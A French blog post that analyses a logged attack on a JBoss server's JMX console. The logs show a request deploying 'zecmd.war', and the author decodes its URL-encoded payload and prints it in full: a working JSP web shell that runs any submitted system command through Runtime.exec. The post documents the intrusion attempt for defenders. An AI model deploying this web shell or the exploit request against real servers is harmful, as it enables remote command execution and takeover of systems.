Aller au contenu | Aller au menu | Aller à la recherche


JBoss hack

Par PlaceOweb le dimanche, juin 16 2013, 17:28 - JAVA - Lien permanent

Hack JBoss par injection, et exécution de commandes système

Logs web :

23:06:23,766 INFO  [org.jboss.web.tomcat.service.deployers.TomcatDeployment] deploy, ctxPath=/jmx-console
23:06:23,795 INFO  [org.apache.catalina.core.ContainerBase.[jboss.web].[localhost]] REQUEST URI       =/jmx-console/HtmlAdaptor
23:06:23,795 INFO  [org.apache.catalina.core.ContainerBase.[jboss.web].[localhost]]           authType=null
23:06:23,795 INFO  [org.apache.catalina.core.ContainerBase.[jboss.web].[localhost]]  characterEncoding=null
23:06:23,795 INFO  [org.apache.catalina.core.ContainerBase.[jboss.web].[localhost]]      contentLength=-1
23:06:23,795 INFO  [org.apache.catalina.core.ContainerBase.[jboss.web].[localhost]]        contentType=null
23:06:23,795 INFO  [org.apache.catalina.core.ContainerBase.[jboss.web].[localhost]]        contextPath=/jmx-console
23:06:23,795 INFO  [org.apache.catalina.core.ContainerBase.[jboss.web].[localhost]]             locale=fr_FR
23:06:23,795 INFO  [org.apache.catalina.core.ContainerBase.[jboss.web].[localhost]]             method=HEAD
23:06:23,796 INFO  [org.apache.catalina.core.ContainerBase.[jboss.web].[localhost]]          parameter=action=invokeOpByName
23:06:23,796 INFO  [org.apache.catalina.core.ContainerBase.[jboss.web].[localhost]]          parameter=name=jboss.admin:service=DeploymentFileRepository
23:06:23,796 INFO  [org.apache.catalina.core.ContainerBase.[jboss.web].[localhost]]          parameter=methodName=store
23:06:23,796 INFO  [org.apache.catalina.core.ContainerBase.[jboss.web].[localhost]]          parameter=argType=java.lang.String, java.lang.String, java.lang.String, java.lang.String, boolean
23:06:23,796 INFO  [org.apache.catalina.core.ContainerBase.[jboss.web].[localhost]]          parameter=arg0=zecmd.war
23:06:23,796 INFO  [org.apache.catalina.core.ContainerBase.[jboss.web].[localhost]]          parameter=arg1=zecmd
23:06:23,796 INFO  [org.apache.catalina.core.ContainerBase.[jboss.web].[localhost]]          parameter=arg2=.jsp
23:06:23,796 INFO  [org.apache.catalina.core.ContainerBase.[jboss.web].[localhost]]          parameter=arg3=<%@ page import="java.util.*,java.io.*"%> <% %> <HTML><BODY> <FORM METHOD="GET" NAME="comments" ACTION=""> <INPUT TYPE="text" NAME="comment"> <INPUT TYPE="submit" VALUE="Send"> </FORM> <pre> <% if (request.getParameter("comment") != null) { out.println("Command: " + request.getParameter("comment") + "<BR>"); Process p = Runtime.getRuntime().exec(request.getParameter("comment")); OutputStream os = p.getOutputStream(); InputStream in = p.getInputStream(); DataInputStream dis = new DataInputStream(in); String disr = dis.readLine(); while ( disr != null ) { out.println(disr); disr = dis.readLine(); } } %> </pre> </BODY></HTML>
23:06:23,796 INFO  [org.apache.catalina.core.ContainerBase.[jboss.web].[localhost]]          parameter=arg4=True
23:06:23,796 INFO  [org.apache.catalina.core.ContainerBase.[jboss.web].[localhost]]           pathInfo=null
23:06:23,796 INFO  [org.apache.catalina.core.ContainerBase.[jboss.web].[localhost]]           protocol=HTTP/1.0
23:06:23,797 INFO  [org.apache.catalina.core.ContainerBase.[jboss.web].[localhost]]        queryString=action=invokeOpByName&name=jboss.admin%3Aservice%3DDeploymentFileRepository&methodName=store&argType=java.lang.String&arg0=zecmd.war&argType=java.lang.String&arg1=zecmd&argType=java.lang.String&arg2=.jsp&argType=java.lang.String&arg3=%3c%25%40%20%70%61%67%65%20%69%6d%70%6f%72%74%3d%22%6a%61%76%61%2e%75%74%69%6c%2e%2a%2c%6a%61%76%61%2e%69%6f%2e%2a%22%25%3e%20%3c%25%20%25%3e%20%3c%48%54%4d%4c%3e%3c%42%4f%44%59%3e%20%3c%46%4f%52%4d%20%4d%45%54%48%4f%44%3d%22%47%45%54%22%20%4e%41%4d%45%3d%22%63%6f%6d%6d%65%6e%74%73%22%20%41%43%54%49%4f%4e%3d%22%22%3e%20%3c%49%4e%50%55%54%20%54%59%50%45%3d%22%74%65%78%74%22%20%4e%41%4d%45%3d%22%63%6f%6d%6d%65%6e%74%22%3e%20%3c%49%4e%50%55%54%20%54%59%50%45%3d%22%73%75%62%6d%69%74%22%20%56%41%4c%55%45%3d%22%53%65%6e%64%22%3e%20%3c%2f%46%4f%52%4d%3e%20%3c%70%72%65%3e%20%3c%25%20%69%66%20%28%72%65%71%75%65%73%74%2e%67%65%74%50%61%72%61%6d%65%74%65%72%28%22%63%6f%6d%6d%65%6e%74%22%29%20%21%3d%20%6e%75%6c%6c%29%20%7b%20%6f%75%74%2e%70%72%69%6e%74%6c%6e%28%22%43%6f%6d%6d%61%6e%64%3a%20%22%20%2b%20%72%65%71%75%65%73%74%2e%67%65%74%50%61%72%61%6d%65%74%65%72%28%22%63%6f%6d%6d%65%6e%74%22%29%20%2b%20%22%3c%42%52%3e%22%29%3b%20%50%72%6f%63%65%73%73%20%70%20%3d%20%52%75%6e%74%69%6d%65%2e%67%65%74%52%75%6e%74%69%6d%65%28%29%2e%65%78%65%63%28%72%65%71%75%65%73%74%2e%67%65%74%50%61%72%61%6d%65%74%65%72%28%22%63%6f%6d%6d%65%6e%74%22%29%29%3b%20%4f%75%74%70%75%74%53%74%72%65%61%6d%20%6f%73%20%3d%20%70%2e%67%65%74%4f%75%74%70%75%74%53%74%72%65%61%6d%28%29%3b%20%49%6e%70%75%74%53%74%72%65%61%6d%20%69%6e%20%3d%20%70%2e%67%65%74%49%6e%70%75%74%53%74%72%65%61%6d%28%29%3b%20%44%61%74%61%49%6e%70%75%74%53%74%72%65%61%6d%20%64%69%73%20%3d%20%6e%65%77%20%44%61%74%61%49%6e%70%75%74%53%74%72%65%61%6d%28%69%6e%29%3b%20%53%74%72%69%6e%67%20%64%69%73%72%20%3d%20%64%69%73%2e%72%65%61%64%4c%69%6e%65%28%29%3b%20%77%68%69%6c%65%20%28%20%64%69%73%72%20%21%3d%20%6e%75%6c%6c%20%29%20%7b%20%6f%75%74%2e%70%72%69%6e%74%6c%6e%28%64%69%73%72%29%3b%20%64%69%73%72%20%3d%20%64%69%73%2e%72%65%61%64%4c%69%6e%65%28%29%3b%20%7d%20%7d%20%25%3e%20%3c%2f%70%72%65%3e%20%3c%2f%42%4f%44%59%3e%3c%2f%48%54%4d%4c%3e&argType=boolean&arg4=True
23:06:23,797 INFO  [org.apache.catalina.core.ContainerBase.[jboss.web].[localhost]]         remoteAddr=192.168.30.254
23:06:23,797 INFO  [org.apache.catalina.core.ContainerBase.[jboss.web].[localhost]]         remoteHost=192.168.30.254
23:06:23,797 INFO  [org.apache.catalina.core.ContainerBase.[jboss.web].[localhost]]         remoteUser=null
23:06:23,797 INFO  [org.apache.catalina.core.ContainerBase.[jboss.web].[localhost]] requestedSessionId=null
23:06:23,797 INFO  [org.apache.catalina.core.ContainerBase.[jboss.web].[localhost]]             scheme=http
23:06:23,797 INFO  [org.apache.catalina.core.ContainerBase.[jboss.web].[localhost]]         serverName=PC-user.placeoweb.com
23:06:23,797 INFO  [org.apache.catalina.core.ContainerBase.[jboss.web].[localhost]]         serverPort=8080
23:06:23,797 INFO  [org.apache.catalina.core.ContainerBase.[jboss.web].[localhost]]        servletPath=/HtmlAdaptor
23:06:23,797 INFO  [org.apache.catalina.core.ContainerBase.[jboss.web].[localhost]]           isSecure=false
23:06:23,797 INFO  [org.apache.catalina.core.ContainerBase.[jboss.web].[localhost]] ---
23:06:23,833 INFO  [org.apache.catalina.core.ContainerBase.[jboss.web].[localhost]] ---
23:06:23,833 INFO  [org.apache.catalina.core.ContainerBase.[jboss.web].[localhost]]           authType=null
23:06:23,833 INFO  [org.apache.catalina.core.ContainerBase.[jboss.web].[localhost]]      contentLength=-1
23:06:23,833 INFO  [org.apache.catalina.core.ContainerBase.[jboss.web].[localhost]]        contentType=text/html;charset=utf-8
23:06:23,833 INFO  [org.apache.catalina.core.ContainerBase.[jboss.web].[localhost]]             header=X-Powered-By=Servlet/3.0; JBossAS-6
23:06:23,833 INFO  [org.apache.catalina.core.ContainerBase.[jboss.web].[localhost]]             header=Pragma=No-cache
23:06:23,833 INFO  [org.apache.catalina.core.ContainerBase.[jboss.web].[localhost]]             header=Cache-Control=no-cache
23:06:23,833 INFO  [org.apache.catalina.core.ContainerBase.[jboss.web].[localhost]]             header=Expires=Thu, 01 Jan 1970 01:00:00 CET
23:06:23,833 INFO  [org.apache.catalina.core.ContainerBase.[jboss.web].[localhost]]             header=WWW-Authenticate=Basic realm="JBoss JMX Console"
23:06:23,834 INFO  [org.apache.catalina.core.ContainerBase.[jboss.web].[localhost]]            message=null
23:06:23,834 INFO  [org.apache.catalina.core.ContainerBase.[jboss.web].[localhost]]         remoteUser=null
23:06:23,834 INFO  [org.apache.catalina.core.ContainerBase.[jboss.web].[localhost]]             status=401
23:06:23,834 INFO  [org.apache.catalina.core.ContainerBase.[jboss.web].[localhost]] ===============================================================

En décodant (url format) la string :

%3c%25%40%20%70%61%67%65%20%69%6d%70%6f%72%74%3d%22%6a%61%76%61%2e%75%74%69%6c%2e%2a%2c%6a%61%76%61%2e%69%6f%2e%2a%22%25%3e%20%3c%25%20%25%3e%20%3c%48%54%4d%4c%3e%3c%42%4f%44%59%3e%20%3c%46%4f%52%4d%20%4d%45%54%48%4f%44%3d%22%47%45%54%22%20%4e%41%4d%45%3d%22%63%6f%6d%6d%65%6e%74%73%22%20%41%43%54%49%4f%4e%3d%22%22%3e%20%3c%49%4e%50%55%54%20%54%59%50%45%3d%22%74%65%78%74%22%20%4e%41%4d%45%3d%22%63%6f%6d%6d%65%6e%74%22%3e%20%3c%49%4e%50%55%54%20%54%59%50%45%3d%22%73%75%62%6d%69%74%22%20%56%41%4c%55%45%3d%22%53%65%6e%64%22%3e%20%3c%2f%46%4f%52%4d%3e%20%3c%70%72%65%3e%20%3c%25%20%69%66%20%28%72%65%71%75%65%73%74%2e%67%65%74%50%61%72%61%6d%65%74%65%72%28%22%63%6f%6d%6d%65%6e%74%22%29%20%21%3d%20%6e%75%6c%6c%29%20%7b%20%6f%75%74%2e%70%72%69%6e%74%6c%6e%28%22%43%6f%6d%6d%61%6e%64%3a%20%22%20%2b%20%72%65%71%75%65%73%74%2e%67%65%74%50%61%72%61%6d%65%74%65%72%28%22%63%6f%6d%6d%65%6e%74%22%29%20%2b%20%22%3c%42%52%3e%22%29%3b%20%50%72%6f%63%65%73%73%20%70%20%3d%20%52%75%6e%74%69%6d%65%2e%67%65%74%52%75%6e%74%69%6d%65%28%29%2e%65%78%65%63%28%72%65%71%75%65%73%74%2e%67%65%74%50%61%72%61%6d%65%74%65%72%28%22%63%6f%6d%6d%65%6e%74%22%29%29%3b%20%4f%75%74%70%75%74%53%74%72%65%61%6d%20%6f%73%20%3d%20%70%2e%67%65%74%4f%75%74%70%75%74%53%74%72%65%61%6d%28%29%3b%20%49%6e%70%75%74%53%74%72%65%61%6d%20%69%6e%20%3d%20%70%2e%67%65%74%49%6e%70%75%74%53%74%72%65%61%6d%28%29%3b%20%44%61%74%61%49%6e%70%75%74%53%74%72%65%61%6d%20%64%69%73%20%3d%20%6e%65%77%20%44%61%74%61%49%6e%70%75%74%53%74%72%65%61%6d%28%69%6e%29%3b%20%53%74%72%69%6e%67%20%64%69%73%72%20%3d%20%64%69%73%2e%72%65%61%64%4c%69%6e%65%28%29%3b%20%77%68%69%6c%65%20%28%20%64%69%73%72%20%21%3d%20%6e%75%6c%6c%20%29%20%7b%20%6f%75%74%2e%70%72%69%6e%74%6c%6e%28%64%69%73%72%29%3b%20%64%69%73%72%20%3d%20%64%69%73%2e%72%65%61%64%4c%69%6e%65%28%29%3b%20%7d%20%7d%20%25%3e%20%3c%2f%70%72%65%3e%20%3c%2f%42%4f%44%59%3e%3c%2f%48%54%4d%4c%3e

On obtient un joli formulaire classique HTML permettant effectuer (Runtime.getRuntime().exec) sur le système les commandes passées en arguments :

<%@ page import="java.util.*,java.io.*"%>
<% %>
<HTML>
<BODY>
<FORM METHOD="GET" NAME="comments" ACTION="">
  <INPUT TYPE="text" NAME="comment">
  <INPUT TYPE="submit" VALUE="Send">
</FORM>
<pre>  
<% 
		if (request.getParameter("comment") != null) {
			out.println("Command: " + request.getParameter("comment") + "<BR>");
			Process p = Runtime.getRuntime().exec(request.getParameter("comment"));
			OutputStream os = p.getOutputStream();
			InputStream in = p.getInputStream();
			DataInputStream dis = new DataInputStream(in);
			String disr = dis.readLine();
			while (disr != null) {
				out.println(disr);
				disr = dis.readLine();
			}
		}
%> 
</pre>
</BODY>
</HTML>

Ajouter un commentaire

Le code HTML est affiché comme du texte et les adresses web sont automatiquement transformées.

Fil des commentaires de ce billet